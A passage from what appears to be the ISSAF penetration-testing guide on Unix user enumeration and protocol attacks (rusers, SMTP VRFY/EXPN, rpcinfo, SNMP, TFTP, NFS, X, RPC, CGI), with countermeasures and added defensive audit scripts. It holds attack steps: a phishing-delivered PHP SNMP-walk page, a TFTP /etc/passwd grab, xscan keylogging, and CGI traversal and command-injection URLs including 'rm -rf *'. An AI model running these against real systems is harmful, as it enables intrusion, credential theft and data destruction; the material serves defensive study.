Examples / Results
#rwho -a wally becky smith
becky   cygnus:pts0   Jan 17 11:20   :12
smith   aquila:ttyp0  Jan 15 09:52   :22
wally   lyra:pts7     Jan 17 13:15  1:32
wally   lyra:pts8     Jan 17 14:15  1:01
Analysis/Conclusion/Observation
As you can see, wally, becky and smith are online and wally has been idle for more than one hour. These are the details we can use to check who is watching and who is active.
Countermeasure
• Disable the rwho service if not used from /etc/inetd.conf and restart the inetd process. This is only for Sun OS and some flavors of Linux.
• Use xinetd/tcpwrappers as per your need to control access to services based on the following:
  • Host/IP
  • Users
  • User Group
  • Access Time
• Recommended to block the port on the external router/firewall.
• Disable the service if not used from /etc/xinetd.conf (or delete the service's file from xinetd.d) and restart the xinetd process.
• Run the service on a non-standard port from /etc/services. Be aware that there are administrative problems with this: the client needs to run the service on the same port as the server.
• Give access on a need-to-know basis on specific interfaces using xinetd/tcpwrappers or any firewall (iptables).
E.4.1.3 USER IDENTIFICATION: RUSER
Description
This is similar to who, but only for the local network. It is used to provide information on who is currently logged into the systems in the local network. It works on UDP port 513.
Steps to be performed
• #rusers -a <target IP>
• #rusers -l <target IP>
Examples / Results - 1
#rusers -a <target IP>
[root@localhost root]# rusers -a 192.168.0.60
192.168.0.60   root root root root gaurav
Analysis/Conclusion/Observation
This will come up with usernames with the corresponding hostnames, and the hostnames even if no one is logged on to them. The host names are useful to map the network completely. The usernames, as usual, come in handy while trying to gain access.
Examples / Results - 2
#rusers -l <target>
[root@localhost root]# rusers -l 192.168.0.60
root     192.168.0.60:tty1    May 11 22:02   :01
root     192.168.0.60:pts/0   May 12 02:00   :01  (192.168.0.100)
root     192.168.0.60:pts/1   May 12 00:35   :16  (192.168.0.1)
root     192.168.0.60:pts/2   May 12 01:39   :15  (192.168.0.70)
gaurav   192.168.0.60:pts/3   May 12 01:41        (192.168.0.1)
Analysis/Conclusion/Observation
This will produce a list of users sorted alphabetically by hostname.
Countermeasure
Disable the service if it does not need to be used:
• Disable the rusers service if not used from /etc/inetd.conf and restart the inetd process. This is only for Sun OS and some flavors of Linux.
• Use xinetd/tcpwrappers as per your need to control access to services based on the following:
  • Host/IP
  • Users
  • User Group
  • Access Time
• Recommended to block the port on the external router/firewall.
• Disable the service if not used from /etc/xinetd.conf (or delete the service's file from xinetd.d) and restart the xinetd process.
• Run the service on a non-standard port from /etc/services. Be aware that there are administrative problems with this: the client needs to run the service on the same port as the server.
• Give access on a need-to-know basis on specific interfaces using xinetd/tcpwrappers or any firewall (iptables).
E.4.1.4 USER IDENTIFICATION: SMTP
Description
Simple Mail Transfer Protocol service works on Port 25 and supports VRFY, EXPN,
ESMTP, HELP, and/or EHLO
The EXPN and VRFY commands can be used for user enumeration.
EXPN Command
A remote attacker can use EXPN command to find mail aliases. He can find username
that is mapped to the administrator account on the mail server.
VRFY Command
A remote attacker can get the first and last name registered to any email account. These names can also be used in social engineering attacks.
Steps to be performed
• telnet <target> 25
• vrfy $user
NOTE: Replace $user with a username.
Examples / Results
"telnet target 25".
vrfy user
This will produce an output like:
250 kartikeya puri <user@target>
expn all
250-someone somewhere <user@target1>
250-another guy <root@target1>
250-yetanotehr guy <guest@target2>
250-real babe babe@babevilla
Analysis/Conclusion/Observation
Many a times users tend to keep their passwords as a combination of their full name.
This information can be used for social engineering attacks as well.
Another magic command is expn. It is similar to the vrfy command, except that in the
case of a mailing list, or expansion list, it will show all the members of that list. The
SMTP expn command causes the MTA to expand (show all the recipients) of an
address. To illustrate the risk, consider that many sites have aliases that include all or a
large segment of users. Such aliases often have easily guessed names, such as all (as
used in above example), everyone, users, subscribers or staff. A simple probe to all
gave the list of users under that alias.
Countermeasure
ƒ
Disable the VRFY and EXPN command using SMTP Server’s manual. CVE: CAN1999-0531
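After disabling the commands, the same VRFY/EXPN exchange can be replayed to confirm the server no longer expands addresses. The check below is an added example, not ISSAF code; ScriptedTransport, SmtplibTransport and the two reply tables are assumptions of this example (the scripted replies are constructed from the session above).

```python
"""Verify that an SMTP server no longer answers VRFY/EXPN with account data.

Added example (not ISSAF code). The transport is pluggable: ScriptedTransport
replays canned replies (constructed, modelled on the session above) so the
check runs offline; SmtplibTransport sends the same commands to a host you
administer. Both classes and their reply tables are assumptions of this example.
"""
import smtplib
from typing import Dict, Tuple

LEAKING_CODES = {250}   # 250 = the server expanded the address (as in the page's output)


class SmtplibTransport:
    """Real transport: issue raw commands through smtplib.SMTP.docmd()."""

    def __init__(self, host: str, port: int = 25, timeout: float = 10.0):
        self.conn = smtplib.SMTP(host, port, timeout=timeout)
        self.conn.ehlo_or_helo_if_needed()

    def command(self, verb: str, arg: str) -> Tuple[int, str]:
        code, msg = self.conn.docmd(verb, arg)
        return code, msg.decode("utf-8", errors="replace")

    def close(self) -> None:
        self.conn.quit()


class ScriptedTransport:
    """Offline stand-in: answers from a table of (code, text) per command."""

    def __init__(self, replies: Dict[str, Tuple[int, str]]):
        self.replies = replies

    def command(self, verb: str, arg: str) -> Tuple[int, str]:
        return self.replies.get(verb.upper(), (502, "5.5.2 Command not implemented"))

    def close(self) -> None:
        pass


def check_enumeration(transport, user: str = "root", alias: str = "all") -> dict:
    """Send VRFY <user> and EXPN <alias>; report what each one discloses."""
    report = {}
    try:
        for verb, arg in (("VRFY", user), ("EXPN", alias)):
            code, text = transport.command(verb, arg)
            leaks = code in LEAKING_CODES
            # smtplib joins the lines of a multi-line reply ("250-...") with newlines
            entries = [line.strip() for line in text.splitlines() if line.strip()] if leaks else []
            report[verb] = {"code": code, "leaks": leaks, "entries": entries}
    finally:
        transport.close()
    report["hardened"] = not (report["VRFY"]["leaks"] or report["EXPN"]["leaks"])
    return report


# Constructed replies for a server before hardening (as in the session above)
UNHARDENED = {
    "VRFY": (250, "kartikeya puri <user@target>"),
    "EXPN": (250, "someone somewhere <user@target1>\n"
                  "another guy <root@target1>\n"
                  "yetanother guy <guest@target2>"),
}
# Constructed replies after the commands were disabled (e.g. sendmail
# PrivacyOptions=novrfy,noexpn or Postfix disable_vrfy_command=yes)
HARDENED = {
    "VRFY": (252, "2.5.2 Cannot VRFY user; try RCPT to attempt delivery"),
    "EXPN": (502, "5.7.0 Sorry, we do not allow this operation"),
}

if __name__ == "__main__":
    for label, table in (("before", UNHARDENED), ("after", HARDENED)):
        print(label, check_enumeration(ScriptedTransport(table)))
```

Against a live host, replace the scripted transport with SmtplibTransport("mail.example.invalid") and treat any 250 reply as a finding.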
E.4.1.5 USER IDENTIFICATION: RPCINFO
Description
Suppose there is a remote host and we don't know any usernames because the previous methods have failed us. Suppose that during our investigation we found that this server is running portmap. It would be useful to know the names of the programs running, so we can try the exploits for those services with no need to wait for cracking usernames and passwords. All we need to do is probe the target for RPC information.
Steps to be performed
#rpcinfo -p target
Examples / Results - 1
#rpcinfo -p target
program vers proto port
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100232 10 udp 32772 sadmind
100221 1 tcp 32772
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100068 5 udp 32773
300326 4 tcp 32773
100249 1 udp 32778
100249 1 tcp 32779
300598 1 udp 32781
300598 1 tcp 32780
805306368 1 udp 32781
805306368 1 tcp 32780
Analysis/Conclusion/Observation
This probes the portmap service on the host target using version 2 of the portmap protocol and displays a list of all registered RPC programs. Remember that NFS runs on RPC. If the mountd RPC process is listed, showmount -e $target may prove useful.
Countermeasure
Restrict access from the perimeter firewall/router and from any unnecessary location.
Stop the portmap service if RPC is not used. Remember that the following important programs use RPC: NFS, NIS, wall, rstatd, r-services.
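Before stopping portmap, an administrator needs to know which of the registered programs are in use. The script below, an added example and not ISSAF code, parses the rpcinfo output shown above (reused here as constructed input), fills in names rpcinfo left blank from the well-known program numbers, and flags the RPC-dependent services the countermeasure lists.

```python
"""Inventory the RPC programs a host exposes from 'rpcinfo -p' output.

Added example (not ISSAF code). It parses the table format shown above, fills
in names that rpcinfo leaves blank from a table of well-known program numbers,
and flags the RPC-dependent services the countermeasure lists so an
administrator knows what stops working before portmap is shut down.
SAMPLE_RPCINFO is the output above, reused as constructed input.
"""
from dataclasses import dataclass
from typing import Dict, List, Set

# Well-known RPC program numbers (rpc(5) assignments)
KNOWN_PROGRAMS: Dict[int, str] = {
    100000: "portmapper", 100001: "rstatd", 100002: "rusersd", 100003: "nfs",
    100004: "ypserv", 100005: "mountd", 100007: "ypbind", 100008: "walld",
    100009: "yppasswdd", 100011: "rquotad", 100021: "nlockmgr", 100024: "status",
    100068: "cmsd", 100083: "ttdbserverd", 100232: "sadmind",
}
# Services the section names as RPC users or as historical attack targets
OF_CONCERN: Set[str] = {
    "nfs", "mountd", "nlockmgr", "status",        # NFS
    "ypserv", "ypbind", "yppasswdd",               # NIS
    "rstatd", "rusersd", "walld",                  # rstatd / wall / r-services
    "cmsd", "ttdbserverd", "sadmind",              # CDE / Solaris daemons
}


@dataclass
class RpcEntry:
    program: int
    version: int
    proto: str
    port: int
    name: str


def parse_rpcinfo(text: str) -> List[RpcEntry]:
    """Turn 'program vers proto port [name]' rows into RpcEntry objects."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].isdigit():
            continue  # header, blank or unrelated line
        program = int(fields[0])
        name = fields[4] if len(fields) > 4 else KNOWN_PROGRAMS.get(program, "unknown")
        entries.append(RpcEntry(program, int(fields[1]), fields[2], int(fields[3]), name))
    return entries


def summarize(entries: List[RpcEntry]) -> dict:
    """Group ports by service name and pick out the ones that matter."""
    by_name: Dict[str, Set[str]] = {}
    for e in entries:
        by_name.setdefault(e.name, set()).add(f"{e.proto}/{e.port}")
    services = {n: sorted(p) for n, p in by_name.items()}
    return {
        "services": services,
        "of_concern": {n: services[n] for n in sorted(services) if n in OF_CONCERN},
        "nfs_exposed": bool({"nfs", "mountd"} & services.keys()),
        "unidentified": sorted({e.program for e in entries if e.name == "unknown"}),
    }


# The rpcinfo output from the example above (constructed input for this script)
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100232   10   udp  32772  sadmind
    100221    1   tcp  32772
    100068    2   udp  32773
    100068    3   udp  32773
    100068    4   udp  32773
    100068    5   udp  32773
    300326    4   tcp  32773
    100249    1   udp  32778
    100249    1   tcp  32779
    300598    1   udp  32781
    300598    1   tcp  32780
 805306368    1   udp  32781
 805306368    1   tcp  32780
"""

if __name__ == "__main__":
    report = summarize(parse_rpcinfo(SAMPLE_RPCINFO))
    for name, ports in report["of_concern"].items():
        print(f"{name:12s} {', '.join(ports)}")
    print("unidentified program numbers:", report["unidentified"])
```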
Remark
This service has a history of vulnerabilities and is a prime target for attackers.
Further Reading and Links
SANS TOP-20: www.sans.org/top20
E.5 EXAMINE COMMON PROTOCOLS
SNMP
TFTP
FTP
SMTP
HTTP
NNTP
Telnet
Layer 2 Protocols
E.5.1 Examine SNMP Service
Description
Simple Network Management Protocol: a boon for administrators who need it and know how to use it, and a curse for someone who is not really careful with it. SNMP uses community names; there are two, one public and another private, and each community has its own read or write permissions. By default the SNMP community strings on some servers are "private" and "public". Compromising SNMP community strings makes a major dent in the overall security. Guessing a community string with write privilege is similar to compromising the box. SNMP can be used to identify the operating system, enumerate users/shares, read uptime, system name and services, and modify the configuration of a device (router, firewall, etc.).
Objective
To obtain configuration details and write access to devices
Expected Result[s]
Depending on device type
Pre-Requisite
SNMP service should be running on the target machine
Process:
1. Determine SNMP community strings on the target
2. Get MIB values by SNMPwalking and pilfer for information
3. Compromise the System
E.5.1.1 DETERMINE SNMP COMMUNITY STRINGS ON THE TARGET
Description
This can be achieved in the following ways:
1. Guess community strings
2. Brute-force community strings
3. OS-scan the device, try to discover the vendor and use default password lists
4. Sniffing
Examples / Results
http://www.securiteam.com/tools/5EP0N154UC.html
Analysis/Conclusion/Observation
E.5.1.2 GET MIB VALUES BY SNMPWALKING AND PILFER FOR INFORMATION
1. Identify Operating System
2. Identify Server Uptime
3. Identify Processes / Services
4. Identify Shares
5. Identify users
Examples / Results - 1
PHP function for SNMP walk
Description:
PHP has an inbuilt function for performing SNMP walking. The format of the snmpwalk function is array snmpwalk (string hostname, string community, string object_id [, int timeout [, int retries]])
A snippet from the PHP manual for snmpwalk says "Returns an array of SNMP object values starting from the object_id as root and FALSE on error."
The snmpwalk() function is used to read all the values from the SNMP agent specified by hostname. community specifies the read community for that agent. A NULL object_id is taken as the root of the SNMP object tree and all objects under that tree are returned as an array. If object_id is specified, all the SNMP objects below that object_id are returned.
Pre-requisite
One needs to know the community names. If the default community names "private" and
"public" are enabled, then the following code will work just fine.
Steps To be performed:
1. Change the public or private string names if needed.
2. Host the page on a web-server with PHP4 support.
3. Trick the user into using this page (a forged email can be used).
4. Download data.txt for reading the results.
<?php
$ip = getip();                                 // the IP of the visiting (target) machine
$filename = "data.txt";                        // results file; it must reside on the server
$useragent = $_SERVER['HTTP_USER_AGENT'];     // browser name (useful for OS guessing)
$date = date("F j, Y, g:i a");                 // to keep track of who visited the page and when
$fh = fopen($filename, "a") or die("Internal error");
// Walk the whole MIB tree of the visitor's host with the two default community names.
$a = snmpwalk($ip, "public", "") or die("Internal Error");
$b = snmpwalk($ip, "private", "") or die("Internal Error");
for ($i = 0; $i < count($a); $i++) {
    echo $a[$i];
    $data = $ip . "|" . $useragent . "|" . $date . "|" . $a[$i] . "\n";
    fwrite($fh, $data) or die("Internal Error");
}
for ($i = 0; $i < count($b); $i++) {
    echo $b[$i];
    $data = $ip . "|" . $useragent . "|" . $date . "|" . $b[$i] . "\n";
    fwrite($fh, $data) or die("Internal Error");
}
fclose($fh);
echo "This page is down for maintenance";

// The following function gets the visiting machine's IP, depending on the
// server settings. Thanks Shaolin Tiger for help with this bit.
function getip()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "0.0.0.0"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "0.0.0.0"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "0.0.0.0"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "0.0.0.0"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "0.0.0.0";
    return ($ip);
}
?>
Analysis/Conclusion/Observation
The attacker sends a malicious link to the target. The target clicks on it and the inline code is executed; it collects sensitive information from the target and sends it to the attacker, evading the proxy/firewall in the process.
Countermeasure
• If the service is not absolutely required, disable it.
• Filter SNMP (TCP/UDP 161, 162) traffic at the firewall. Allow only trusted subnets to poll or manage devices, and do not expose SNMP externally unless it cannot be avoided.
• Consider community strings as important as passwords and apply the same best practices. (secret = secre?t)
• Try using SNMP v3 with message authentication and PDU encryption.
• Deploy a host-based firewall (access control system) to filter SNMP traffic.
• Try to make MIBs read-only wherever possible.
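Several of these countermeasures can be checked directly in the agent's configuration. The audit below is an added example, not ISSAF code; it reads net-snmp's rocommunity/rwcommunity/com2sec directives, and the two sample configurations are constructed.

```python
"""Audit a net-snmp snmpd.conf for the weaknesses the countermeasures list.

Added example (not ISSAF code). It checks three net-snmp directives:
    rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
    rwcommunity COMMUNITY [SOURCE [OID | -V VIEW]]
    com2sec     NAME SOURCE COMMUNITY
and flags default names ("public"/"private"), write access, communities open
to any source and short strings. The two sample configurations are constructed.
"""
import shlex
from typing import Dict, List

DEFAULT_COMMUNITIES = {"public", "private"}
ANY_SOURCE = {"default", "0.0.0.0/0", "0.0.0.0", "::/0"}
MIN_LENGTH = 12   # policy choice for this example, not a net-snmp setting


def audit_snmpd_conf(text: str) -> List[Dict]:
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = shlex.split(line)
        directive = tokens[0].lower()
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            community = tokens[1] if len(tokens) > 1 else ""
            source = tokens[2] if len(tokens) > 2 else "default"
            if source == "-V":            # view given without a source: open to all
                source = "default"
            writable = directive.startswith("rw")
        elif directive == "com2sec" and len(tokens) >= 4:
            # write access for com2sec comes from later group/access lines,
            # so only the community string and its source are judged here
            community, source, writable = tokens[3], tokens[2], False
        else:
            continue
        issues = []
        if community.lower() in DEFAULT_COMMUNITIES:
            issues.append("default community name")
        if writable:
            issues.append("write access")
        if source in ANY_SOURCE:
            issues.append("no source restriction")
        if len(community) < MIN_LENGTH:
            issues.append("short community string")
        if issues:
            findings.append({"line": lineno, "directive": directive,
                             "community": community, "source": source, "issues": issues})
    return findings


WEAK_CONF = """\
# constructed: a typical out-of-the-box configuration
rocommunity public
rwcommunity private
com2sec local  localhost   public
com2sec mynet  10.0.0.0/8  s3cr3tNetw0rk
"""

HARDENED_CONF = """\
# constructed: read-only, long string, one management subnet, restricted view
view systemonly included .1.3.6.1.2.1.1
rocommunity L0ng-and-r4ndom-string 10.0.5.0/24 -V systemonly
"""

if __name__ == "__main__":
    for finding in audit_snmpd_conf(WEAK_CONF):
        print(f"line {finding['line']}: {finding['directive']} "
              f"'{finding['community']}' from {finding['source']}: {', '.join(finding['issues'])}")
    print("hardened config findings:", audit_snmpd_conf(HARDENED_CONF))
```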
Further Readings
Cisco’s paper on SNMP
Using SNMP for Reconnaissance
E.5.2 Examine Trivial File Transfer Protocol (TFTP)
Description
TFTP uses UDP for data transfer; it is a connectionless protocol that does not support authentication. TFTP is a limited FTP service with no authentication and supports a very limited set of commands. It is commonly used by routers, switches and other devices to connect to a TFTP server during firmware upgrades.
Objective
To retrieve files without authentication issues
Expected Result[s]
Information that may be used to further compromise the system: configuration files, logs,
etc.
Pre-Requisite
A TFTP server accessible by us on the target's network or related sites
Process:
1. Accessing TFTP Prompt
2. Checking own machine’s status
3. Connecting to TFTP Server
4. Guessing and grabbing the file
E.5.2.1 ACCESSING TFTP PROMPT
Examples / Results
#tftp
tftp>_
Analysis/Conclusion/Observation
The attacker is at the tftp prompt. The next step is checking the status.
E.5.2.2 CHECKING OWN MACHINE’S STATUS
Examples / Results
tftp>status
Not connected.
Mode: netascii Verbose: off Tracing: off
Max-timeout: 25 seconds
tftp> _
Analysis/Conclusion/Observation
The status check is performed; now the attacker knows the timeout values and the various attributes.
E.5.2.3 CONNECTING TO TFTP SERVER
Examples / Results
tftp> connect < target IP >
Analysis/Conclusion/Observation
The same prompt (tftp>_) will appear again. It indicates that the attacker is connected to the target.
E.5.2.4 GUESSING AND GRABBING THE FILE
Description
In this step the attacker needs to guess a relevant file with its path. Most of the time files are located in their default location[s], so file names are easy to guess.
Examples / Results
tftp>get /etc/passwd /tmp/passwd.system
Analysis/Conclusion/Observation
The attacker successfully downloaded the password file. In the same way any other file can be downloaded, given misconfigured permissions.
Countermeasure
• TFTP is plain text; consider using secure tftp as an alternative.
• Restrict access to the TFTP server in your firewall / router.
• Move sensitive files from their default locations.
• Define access levels on files.
• In case of Linux, /etc/tftpaccess.ctl
E.6 EXAMINING UNIX SYSTEM
Description
After examining the common protocols, check for UNIX-specific attacks. They can be further subdivided into two categories: 1. Remote attacks and 2. Local attacks.
E.6.1 Remote Attacks
Description
Remote attacks are usually considered more dangerous as the attacker does not need to be physically present, but a local attack may prove equally dangerous if physical security is not taken into account. Remote attacks are hard to trace because of legal, physical and staging (attacking from compromised hosts) constraints.
E.6.2 Password Attacks
Social engineering, trashing, guessing, sniffing, cracking and brute forcing are all activities related to the art of retrieving passwords. But there have also been vulnerabilities, for example in older versions of the ICQ protocol, that allowed anyone to bypass system authentication by taking advantage of flaws at that stage. In the aforementioned ICQ vulnerability, the maximum password length was 8. If you used an alternative ICQ client (at that time the excellent mICQ), you could provide a 9-character password to take over any ICQ User ID. This vulnerability had a related buffer overflow. See the next point.
E.6.3 Buffer Overflows
Description
Buffer overflows are caused when the data copied from a source buffer to a destination buffer lacks bounds checking and overwrites critical areas of memory. This allows taking control of the target program by changing the return address of a function and making it execute an attacker-defined buffer full of so-called "shellcode".
Technically speaking, buffers are often placed next to "interesting" data structures by the compiler. For example, in the case of a function that has a buffer on the stack, the function's return address is placed in memory after the buffer. So, if the attacker can overflow the buffer, he can overwrite the function's return address so that when the function returns, it returns to an address determined by the attacker. Other interesting data structures include C++ v-tables, exception handler addresses and function pointers.
Buffer overflows are the most common programming errors that lead to exploitation of a target program and privilege escalation. In an assessment, a map is made of the programs running with elevated privileges and each binary is checked for buffer mismanagement.
E.6.4 Stack based Overflows
Buffer overflows are classified into stack and heap overflows; the nature of the overflow depends on how the memory was allocated.
Placement on the stack is performed by the PUSH and POP instructions. A value that is pushed onto the stack is copied into a memory location that is referenced, as execution proceeds, by the stack pointer (sp). The sp is then decremented as the stack grows downwards, making room for the next local variables (subl $20,%esp). POP is the reverse of this event. The stack is a LIFO (Last In, First Out) structure, which refers to how the operations on it are ordered.
Stack-based overflows are relatively simple in concept: they involve functions such as strcat(), sprintf(), strcpy(), gets(), etc., anywhere unchecked input is placed into a buffer of fixed length. A common practice is to use the n-variants of those functions: strncat, snprintf, strncpy, and fgets instead of gets.
E.6.5 Heap based Overflows
Dynamically allocated variables, those allocated by malloc(), are created on the heap. Unlike the stack, the heap grows upwards on most systems; that is, new variables created on the heap are located at higher memory addresses than older ones. In a simple heap-based buffer overflow attack, an attacker overflows a buffer that is lower on the heap, overwriting other dynamic variables. Different operating systems use different malloc implementations; for example, Linux uses Doug Lea's malloc (dlmalloc) whereas Windows uses the RtlHeap implementation.
Some applications request a block of memory through the malloc interface that later turns out to be vulnerable to a buffer overflow. This way the data behind the chunk can be changed, and possibly the malloc management structures can be compromised. Exploiting overflows of malloc-allocated buffers consists of modifying this management information in a way that allows arbitrary memory overwrites afterwards. Pointers within the writable process memory can then be overwritten, allowing modification of return addresses, linkage tables or application-level data.
E.6.6 Integer Overflows
Integer overflows are not like most common bug classes. They do not allow direct overwriting of memory or direct control of execution flow, but are much more subtle. The root of the problem lies in the fact that there is no way for a process to check the result of a computation after it has happened, so there may be a discrepancy between the stored result and the correct result.
In a typical integer overflow the attacker overflows a buffer by triggering an arithmetic issue involving integers, most often in counted loops: user input is used as the loop bound, so a buffer is overflowed over the iterations of the loop. Integer overflows also occur when the size of a dynamic memory allocation (such as malloc and alloc) is computed with some form of integer arithmetic.
E.6.7 Format String Attacks
In the C and C++ programming languages it is possible to declare functions that take a variable number of parameters; on each call, one fixed argument has to tell the function how many arguments there actually are. A few examples of these functions are printf(), sprintf() and wsprintf(); their first parameter is called the format string. Each format specifier names a data type that is read from the argument list and written to the output stream, so a format string that contains specifiers with no matching argument lets you manipulate the stack by using the different format data types of the C/C++ language. Format string attacks are mainly due to programming errors in which the format argument is missing, so that user data is passed directly as the format string.
When such subtle errors are made, the attacker can manipulate the stack and exploit the program if he controls the buffer that is passed where the format conversion was missing.
E.6.8 Parsing Errors
Parsing errors are mainly caused by missing sanity checks on the input passed to a buffer. Most of the time the program accepts a buffer, parses it and passes the result on to the rest of the program. When the buffer is user-controllable and passes through a parsing routine, the attacker can craft the buffer to exploit the parsing function and thereby overflow a buffer of the target program.
E.6.9 NFS Share Attacks
• Determine mount points
  showmount -e
  o Determine nfs command setup
  o cd /etc and cat passwd
  o Change value of UID / GID to a privileged user other than root (UID 2, GID 2)
  o Execute nfs client
  o NFS Vulnerabilities
    1. Normally because of segfault
    2. A miscreant user may craft a buffer overflow (BO) by abusing SUID root programs
E.6.10 Examine NFS Share
Description
Take advantage of incorrect /etc/exports configuration.
Objective
Mount remote filesystems, download all relevant files, modify system configuration.
Expected Result[s]
Shell Access to the system.
Pre-Requisite
• NFS share should be enabled
• Access to the service shall be given
Process:
1. Enumerate share on target
2. Mount the share
3. Pilfer for information
1. Enumerate share on target
Examples / Results
#showmount -e target
Analysis/Conclusion/Observation
This prints all directories that are exported for either a local system or a remote system.
Systems that do not export directories to specific clients are particularly vulnerable
because the output of the showmount command reveals that any client on the network
can mount the directory. Anyone on the same network can have access to shares,
depending upon access control.
2. Mount the share
Examples / Results
#mount -t nfs target:/share /mnt
Analysis/Conclusion/Observation
If the permissions of /share are not proper, it will be completely at the tester's mercy. To avoid this, make sure that each exported directory has proper permissions in terms of who can read that directory and who cannot. Define strict rules, because it pays to be paranoid.
3. Pilfer for information
Examples / Results
#find /mnt | grep -i password
Analysis/Conclusion/Observation
Attackers search for the occurrence of the word password in the mounted share. The above command lists every path under /mnt (i.e. the mounted /share) whose file or directory name contains "password".
Countermeasure
• Make sure each exported directory has permissions on a need-to-know basis, in terms of mounting, reading, writing and executing.
• Eliminate world-writable 777 directories/files.
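The export-side half of this check can be automated: the script below, an added example and not ISSAF code, parses a Linux-style /etc/exports and flags the conditions that let any client mount a share as above. SAMPLE_EXPORTS is a constructed file, and the exports(5) syntax assumed is the Linux one.

```python
"""Audit /etc/exports for the misconfiguration this section takes advantage of.

Added example (not ISSAF code), written for the Linux exports(5) format:
    /path  client(opt,opt)  client2(opt)   # no client at all = every host
Flags an export open to any host, wildcard clients, read-write access,
no_root_squash (remote root keeps uid 0) and insecure (any source port).
SAMPLE_EXPORTS is a constructed file.
"""
from typing import Dict, List


def parse_exports(text: str) -> List[Dict]:
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        clients = []
        for token in (parts[1].split() if len(parts) > 1 else []):
            host, _, rest = token.partition("(")
            options = [o for o in rest.rstrip(")").split(",") if o]
            clients.append({"host": host or "*", "options": options})
        if not clients:
            clients.append({"host": "*", "options": []})   # exported to everyone with defaults
        exports.append({"path": parts[0], "clients": clients})
    return exports


def audit_exports(text: str) -> List[Dict]:
    findings = []
    for export in parse_exports(text):
        for client in export["clients"]:
            host, options = client["host"], set(client["options"])
            issues = []
            if host == "*":
                issues.append("exported to any host")
            elif "*" in host or "?" in host:
                issues.append(f"wildcard client {host}")
            if "rw" in options:
                issues.append("read-write")
            if "no_root_squash" in options:
                issues.append("no_root_squash")
            if "insecure" in options:
                issues.append("insecure (unprivileged source ports accepted)")
            if issues:
                findings.append({"path": export["path"], "client": host, "issues": issues})
    return findings


SAMPLE_EXPORTS = """\
# constructed /etc/exports
/share                                         # no client list at all
/export/home   *.example.com(rw,no_root_squash)
/export/pub    10.0.0.0/8(ro,root_squash)  backup.example.com(rw,insecure)
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{finding['path']} -> {finding['client']}: {', '.join(finding['issues'])}")
```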
E.6.11 X-Insecurities
Description
The X Window System provides a wealth of features that allow many programs to share a single graphical display. The major problem with X is that its security model is an all-or-nothing approach. Once a client is granted access to an X server, pandemonium can ensue. X clients can capture the keystrokes of the console user, kill windows, capture windows for display elsewhere, and even remap the keyboard to issue nefarious commands no matter what the user types. Most problems stem from a weak access control paradigm or pure indolence on the part of the system administrator. The simplest and most popular form of X access control is xhost authentication. This mechanism provides access control by IP address and is the weakest form of X authentication.
Examples / Results
[localhost]$ xscan target_machine
Scanning hostname quake ...
Connecting to quake (target_machine) on port 6000...
Connected.
Host quake is running X.
Starting keyboard logging of host quake:0.0 to file KEYLOGquake:0.0...
Now any keystrokes typed at the console will be captured to the KEYLOG.quake file.
[localhost]$ tail -f KEYLOG.quake:0.0
su [Shift_L]Iamowned[Shift_R]!
A quick tail of the log file reveals what the user is typing in real time. In our example, the user issued the su command followed by the root password "Iamowned!". Xscan will even note if the SHIFT keys are pressed. It is also easy for attackers to view specific windows.
E.6.12 RPC Attacks
Description
Remote Procedure Calls (RPCs) allow an administrator to execute commands on networked computers to make large-scale administration more efficient. Because they are used to run administrative commands, the RPC services typically run with the highest privileges on the system. Due to a long history of easily exploited vulnerabilities, RPC services are a continued threat to any organization.
Examples / Results
[localhost]# cmsd.sh quake 192.168.1.xxx 2 192.168.1.xxx
Executing exploit...
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection reset by peer
Countermeasure
The best defense against remote RPC attacks is to disable any RPC service that is not
absolutely necessary. If an RPC service is critical to the operation of the server, consider
implementing an access control device that only allows authorized systems to contact
those RPC ports, which may be very difficult—depending on your environment. Consider
enabling a nonexecutable stack if it is supported by your operating system. Also,
consider using Secure RPC if it is supported by your version of UNIX. Secure RPC
attempts to provide an additional level of authentication based upon public-key
cryptography. Secure RPC is not a panacea, because many UNIX vendors have not
adopted this protocol. Thus, interoperability is a big issue. Finally, ensure that all the
latest vendor patches have been applied.
E.6.13 Web Attacks
Description
Port 80 is the standard port for websites, and it can have a lot of different security issues. These holes can allow an attacker to gain administrative access to the website, or even to the web server itself.
Examples / Results
• http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
• http://host/cgi-bin/lame.cgi?page=ls%20-al|
• http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
• http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
• http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
• http://host/cgibin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd|
